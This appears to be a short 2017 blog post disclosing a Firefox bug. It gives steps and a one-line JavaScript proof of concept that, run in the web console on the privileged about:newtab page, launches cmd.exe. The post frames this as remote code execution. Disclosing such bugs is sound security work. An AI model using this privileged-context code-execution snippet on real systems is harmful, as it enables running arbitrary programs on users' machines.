Saturday 4 March 2017

Firefox Webconsole allows arbitrary code to execute.

Lets do this....

Steps to Reproduce :

1. Open New Tab
2. Ctrl+Shft+K to open a console.
3. Run the following code on the Console

f=Components.classes['@mozilla.org/file/local;1'].createInstance(Components.interfaces.nsILocalFile);f.initWithPath('c:\\Windows\\System32\\cmd.exe');f.launch()

'about:newtab' is considered a chrome privileged page, injecting code within such a context would result in automatic RCE.

Video POC :



Bug Reported by : Dhiraj Mishra  
Share:

0 coment�rios:

Post a Comment